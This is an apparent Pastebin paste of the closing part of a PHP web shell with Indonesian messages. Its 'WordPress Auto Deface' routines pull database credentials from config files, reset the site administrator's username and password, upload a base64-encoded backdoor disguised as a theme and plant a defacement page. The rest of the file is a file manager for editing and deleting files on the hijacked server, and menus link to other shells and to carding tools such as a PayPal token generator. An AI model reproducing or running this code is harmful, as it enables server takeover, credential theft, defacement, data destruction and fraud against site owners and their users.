  3837.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3838.                     $www = "m.php";
  3839.                     $fp5 = fopen($www,"w");
  3840.                     fputs($fp5,$upload3);
  3841.                     $post2 = array(
  3842.                             "_wpnonce" => "$anu2",
  3843.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3844.                             "themezip" => "@$www",
  3845.                             "install-theme-submit" => "Install Now",
  3846.                             );
  3847.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3848.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3849.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3850.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3851.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3852.                           curl_setopt($ch, CURLOPT_POST, 1);
  3853.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3854.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3855.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3856.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3857.                     $data3 = curl_exec($ch);
  3858.                           curl_close($ch);
  3859.                     $y = date("Y");
  3860.                     $m = date("m");
  3861.                     $namafile = "id.php";
  3862.                     $fpi = fopen($namafile,"w");
  3863.                     fputs($fpi,$script);
  3864.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3865.                            curl_setopt($ch6, CURLOPT_POST, true);
  3866.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3867.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3868.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3869.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3870.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3871.                     $postResult = curl_exec($ch6);
  3872.                            curl_close($ch6);
  3873.                     $as = "$target/k.php";
  3874.                     $bs = anucurl($as);
  3875.                     if(preg_match("#$script#is", $bs)) {
  3876.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3877.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3878.                         } else {
  3879.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  3880.                         echo "[!!] coba aja manual: <br>";
  3881.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3882.                         echo "[+] username: <font color=lime>$user</font><br>";
  3883.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3884.                         }
  3885.                     mysql_close($conn);
  3886.                 }
  3887.             }
  3888.         }
  3889.     } else {
  3890.         echo "<center><h1>WordPress Auto Deface</h1>
  3891.         <form method='post'>
  3892.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3893.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  3894.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3895.         </form>
  3896.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3897.         </center>";
  3898.     }
  3899. } elseif($_GET['do'] == 'auto_dwp2') {
  3900.     if($_POST['auto_deface_wp']) {
  3901.         function anucurl($sites) {
  3902.             $ch = curl_init($sites);
  3903.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3904.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3905.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3906.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3907.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3908.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3909.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3910.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3911.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3912.             $data = curl_exec($ch);
  3913.                   curl_close($ch);
  3914.             return $data;
  3915.         }
  3916.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3917.             $post = array(
  3918.                    "log" => "$userr",
  3919.                    "pwd" => "$pass",
  3920.                    "rememberme" => "forever",
  3921.                    "wp-submit" => "$wp_submit",
  3922.                    "redirect_to" => "$web",
  3923.                    "testcookie" => "1",
  3924.                    );
  3925.             $ch = curl_init($cek);
  3926.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3927.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3928.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3929.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3930.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3931.                   curl_setopt($ch, CURLOPT_POST, 1);
  3932.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3933.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3934.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3935.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3936.             $data = curl_exec($ch);
  3937.                   curl_close($ch);
  3938.             return $data;
  3939.         }
  3940.         $link = explode("\r\n", $_POST['link']);
  3941.         $script = htmlspecialchars($_POST['script']);
  3942.         $user = "indoxploit";
  3943.         $pass = "indoxploit";
  3944.         $passx = md5($pass);
  3945.         foreach($link as $dir_config) {
  3946.             $config = anucurl($dir_config);
  3947.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3948.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3949.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3950.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3951.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3952.             $prefix = $dbprefix."users";
  3953.             $option = $dbprefix."options";
  3954.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3955.             $db = mysql_select_db($dbname);
  3956.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3957.             $result = mysql_fetch_array($q);
  3958.             $id = $result[ID];
  3959.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3960.             $result2 = mysql_fetch_array($q2);
  3961.             $target = $result2[option_value];
  3962.             if($target == '') {                
  3963.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3964.             } else {
  3965.                 echo "[+] $target <br>";
  3966.             }
  3967.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3968.             if(!$conn OR !$db OR !$update) {
  3969.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3970.                 mysql_close($conn);
  3971.             } else {
  3972.                 $site = "$target/wp-login.php";
  3973.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  3974.                 $b1 = anucurl($site2);
  3975.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3976.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3977.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3978.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3979.                 $www = "m.php";
  3980.                 $fp5 = fopen($www,"w");
  3981.                 fputs($fp5,$upload3);
  3982.                 $post2 = array(
  3983.                         "_wpnonce" => "$anu2",
  3984.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3985.                         "themezip" => "@$www",
  3986.                         "install-theme-submit" => "Install Now",
  3987.                         );
  3988.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3989.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3990.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3991.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3992.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3993.                       curl_setopt($ch, CURLOPT_POST, 1);
  3994.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3995.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3996.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3997.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3998.                 $data3 = curl_exec($ch);
  3999.                       curl_close($ch);
  4000.                 $y = date("Y");
  4001.                 $m = date("m");
  4002.                 $namafile = "id.php";
  4003.                 $fpi = fopen($namafile,"w");
  4004.                 fputs($fpi,$script);
  4005.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4006.                        curl_setopt($ch6, CURLOPT_POST, true);
  4007.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4008.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4009.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4010.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4011.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4012.                 $postResult = curl_exec($ch6);
  4013.                        curl_close($ch6);
  4014.                 $as = "$target/k.php";
  4015.                 $bs = anucurl($as);
  4016.                 if(preg_match("#$script#is", $bs)) {
  4017.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4018.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4019.                     } else {
  4020.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  4021.                     echo "[!!] coba aja manual: <br>";
  4022.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4023.                     echo "[+] username: <font color=lime>$user</font><br>";
  4024.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  4025.                     }
  4026.                 mysql_close($conn);
  4027.             }
  4028.         }
  4029.     } else {
  4030.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  4031.         <form method='post'>
  4032.         Link Config: <br>
  4033.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4034.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4035.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4036.         </form></center>";
  4037.     }
  4038. } elseif($_GET['act'] == 'newfile') {
  4039.     if($_POST['new_save_file']) {
  4040.         $newfile = htmlspecialchars($_POST['newfile']);
  4041.         $fopen = fopen($newfile, "a+");
  4042.         if($fopen) {
  4043.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4044.         } else {
  4045.             $act = "<font color=red>permission denied</font>";
  4046.         }
  4047.     }
  4048.     echo $act;
  4049.     echo "<form method='post'>
  4050.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4051.     <input type='submit' name='new_save_file' value='Submit'>
  4052.     </form>";
  4053. } elseif($_GET['act'] == 'newfolder') {
  4054.     if($_POST['new_save_folder']) {
  4055.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4056.         if(!mkdir($new_folder)) {
  4057.             $act = "<font color=red>permission denied</font>";
  4058.         } else {
  4059.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4060.         }
  4061.     }
  4062.     echo $act;
  4063.     echo "<form method='post'>
  4064.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4065.     <input type='submit' name='new_save_folder' value='Submit'>
  4066.     </form>";
  4067. } elseif($_GET['act'] == 'rename_dir') {
  4068.     if($_POST['dir_rename']) {
  4069.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4070.         if($dir_rename) {
  4071.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4072.         } else {
  4073.             $act = "<font color=red>permission denied</font>";
  4074.         }
  4075.     echo "".$act."<br>";
  4076.     }
  4077.     echo "<form method='post'>
  4078.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4079.     <input type='submit' name='dir_rename' value='rename'>
  4080.     </form>";
  4081. } elseif($_GET['act'] == 'delete_dir') {
  4082.     function Delete($path)
  4083. {
  4084.     if (is_dir($path) === true)
  4085.     {
  4086.         $files = array_diff(scandir($path), array('.', '..'));
  4087.         foreach ($files as $file)
  4088.         {
  4089.             Delete(realpath($path) . '/' . $file);
  4090.         }
  4091.         return rmdir($path);
  4092.     }
  4093.     else if (is_file($path) === true)
  4094.     {
  4095.         return unlink($path);
  4096.     }
  4097.     return false;
  4098. }
  4099.     $delete_dir = Delete($dir);
  4100.     if($delete_dir) {
  4101.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4102.     } else {
  4103.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4104.     }
  4105.     echo $act;
  4106. } elseif($_GET['act'] == 'view') {
  4107.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4108.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4109. } elseif($_GET['act'] == 'edit') {
  4110.     if($_POST['save']) {
  4111.         $save = file_put_contents($_GET['file'], $_POST['src']);
  4112.         if($save) {
  4113.             $act = "<font color=lime>Saved!</font>";
  4114.         } else {
  4115.             $act = "<font color=red>permission denied</font>";
  4116.         }
  4117.     echo "".$act."<br>";
  4118.     }
  4119.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4120.     echo "<form method='post'>
  4121.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4122.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  4123.     </form>";
  4124. } elseif($_GET['act'] == 'rename') {
  4125.     if($_POST['do_rename']) {
  4126.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4127.         if($rename) {
  4128.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4129.         } else {
  4130.             $act = "<font color=red>permission denied</font>";
  4131.         }
  4132.     echo "".$act."<br>";
  4133.     }
  4134.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4135.     echo "<form method='post'>
  4136.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4137.     <input type='submit' name='do_rename' value='rename'>
  4138.     </form>";
  4139. } elseif($_GET['act'] == 'delete') {
  4140.     $delete = unlink($_GET['file']);
  4141.     if($delete) {
  4142.         $act = "<script>window.location='?dir=".$dir."';</script>";
  4143.     } else {
  4144.         $act = "<font color=red>permission denied</font>";
  4145.     }
  4146.     echo $act;
  4147. }else {
  4148.     if(is_dir($dir) == true) {
  4149.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4150.         <tr>
  4151.         <th class="th_home"><center>Name</center></th>
  4152.         <th class="th_home"><center>Type</center></th>
  4153.         <th class="th_home"><center>Size</center></th>
  4154.         <th class="th_home"><center>Last Modified</center></th>
  4155.         <th class="th_home"><center>Permission</center></th>
  4156.         <th class="th_home"><center>Action</center></th>
  4157.         </tr>';
  4158.         $scandir = scandir($dir);
  4159.         foreach($scandir as $dirx) {
  4160.             $dtype = filetype("$dir/$dirx");
  4161.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4162.             if(!is_dir("$dir/$dirx")) continue;
  4163.             if($dirx === '..') {
  4164.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4165.             } elseif($dirx === '.') {
  4166.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  4167.             } else {
  4168.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4169.             }
  4170.             if($dirx === '.' || $dirx === '..') {
  4171.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4172.                 } else {
  4173.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4174.             }
  4175.             echo "<tr>";
  4176.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4177.             echo "<td class='td_home'><center>$dtype</center></td>";
  4178.             echo "<td class='td_home'><center>-</center></th>";
  4179.             echo "<td class='td_home'><center>$dtime</center></td>";
  4180.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4181.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4182.         }
  4183.         echo "</tr>";
  4184.         foreach($scandir as $file) {
  4185.             $ftype = filetype("$dir/$file");
  4186.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4187.             $size = filesize("$dir/$file")/1024;
  4188.             $size = round($size,3);
  4189.             if($size > 1024) {
  4190.                 $size = round($size/1024,2). 'MB';
  4191.             } else {
  4192.                 $size = $size. 'KB';
  4193.             }
  4194.             if(!is_file("$dir/$file")) continue;
  4195.             echo "<tr>";
  4196.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4197.             echo "<td class='td_home'><center>$ftype</center></td>";
  4198.             echo "<td class='td_home'><center>$size</center></td>";
  4199.             echo "<td class='td_home'><center>$ftime</center></td>";
  4200.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4201.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4202.         }
  4203.         echo "</tr></table>";
  4204.     } else {
  4205.         echo "<font color=red>can't open directory</font>";
  4206.     }
  4207.     }
  4208. echo "<center><hr><form>
  4209. <select onchange='if (this.value) window.open(this.value);'>
  4210.    <option selected='selected' value=''> Tools Creator </option>
  4211.    <option value='$ling=wso'>WSO 2.8.1</option>
  4212.    <option value='$ling=injection'>1n73ction v3</option>
  4213.    <option value='$ling=wk'>WHMCS Killer</option>
  4214.    <option value='$ling=adminer'>Adminer</option>
  4215.    <option value='$ling=b374k'>b374k Shell</option>
  4216.    <option value='$ling=b374k323'>b374k 3.2</option>  
  4217.    <option value='$ling=bh'>BlackHat Shell</option>      
  4218.    <option value='$ling=dhanus'>Dhanush Shell</option>    
  4219.    <option value='$ling=r57'>R57 Shell</option>    
  4220. <option value='$ling=encodedecode'>Encode Decode</option>    
  4221. <option value='$ling=r57'>R57 Shell</option>    
  4222. </select>
  4223. <select onchange='if (this.value) window.open(this.value);'>
  4224.    <option selected='selected' value=''> Tools Carder </option>
  4225.    <option value='$ling=extractor'>DB Email Extractor</option>
  4226.    <option value='$ling=MailerDelay'>MAILER YA Chonx</option>    
  4227.    <option value='$ling=bukalapak'>BukaLapak Checker</option>        
  4228.    <option value='$ling=tokopedia'>TokoPedia Checker</option>  
  4229.    <option value='$ling=tokenpp'>Paypal Token Generator</option>  
  4230.    <option value='$ling=mailer'>Mailer</option>  
  4231.    <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4232.    </select>
  4233. <noscript><input type='submit' value='Submit'></noscript>
  4234. </form></font></center>";
  4235. ?>
  4236. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top